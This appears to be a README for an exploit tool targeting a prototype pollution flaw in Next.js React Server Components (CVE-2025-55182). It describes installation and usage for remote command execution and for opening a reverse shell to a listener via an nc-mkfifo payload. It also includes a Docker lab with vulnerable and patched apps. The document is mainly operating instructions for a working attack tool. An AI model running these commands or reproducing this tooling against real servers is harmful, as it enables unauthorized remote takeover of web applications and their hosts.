## https://sploitus.com/exploit?id=C1801B96-B31F-56C0-A82F-E74AF7E4660E
# Next.js React Server Components RCE Exploit
Exploits CVE-2025-55182 for remote code execution via prototype pollution.
**Author:** Severian N.K.
## Description
This tool exploits a prototype pollution vulnerability in Next.js applications using React Server Components, leading to Remote Code Execution (RCE). It supports both direct command execution and reverse shells.
## Installation
This project uses a Python virtual environment to manage dependencies. First, ensure you have Python 3 installed.
1. **Set up the virtual environment:**
```bash
python3 -m venv venv
```
2. **Activate the environment and install dependencies:**
```bash
source venv/bin/activate
pip install -r requirements.txt
```
## Usage
Make sure the virtual environment is activated (`source venv/bin/activate`) before running the exploit.
### Command Execution
To execute a single command on the target:
```bash
python3 exploit.py -u -c ""
```
**Example:**
```bash
python3 exploit.py -u http://example.com -c "id"
```
### Reverse Shell
To get a reverse shell from the target:
```bash
python3 exploit.py -u -r -l -p
```
**Example:**
```bash
python3 exploit.py -u http://example.com -r -l 10.10.10.2 -p 9001 -P nc-mkfifo
```
## Lab Environment
The `lab/` directory provides a Dockerized environment to safely test the exploit against a vulnerable and a patched application.
### 1. Start the Lab
```bash
cd lab
docker-compose up -d
```
This command starts two containers:
- `react-rsc-vulnerable`: A vulnerable Next.js app on **http://localhost:3011**
- `react-rsc-patched`: A patched Next.js app on **http://localhost:3012**
### 2. Test Command Execution
```bash
python3 exploit.py -u http://localhost:3011 -c "whoami"
```
### 3. Test Reverse Shell (Automated IP Detection)
When targeting `localhost`, the script will now **automatically detect the correct listener IP** for the Docker network. You only need to specify the port.
```bash
python3 exploit.py -u http://localhost:3011 -r -p 9001
```
This makes testing in the lab environment much simpler. The script will find the gateway IP (e.g., `172.27.0.1`) and use it for the listener automatically.
## Contributing
Contributions are welcome! If you find a bug or have an idea for an improvement, please open an issue or submit a pull request.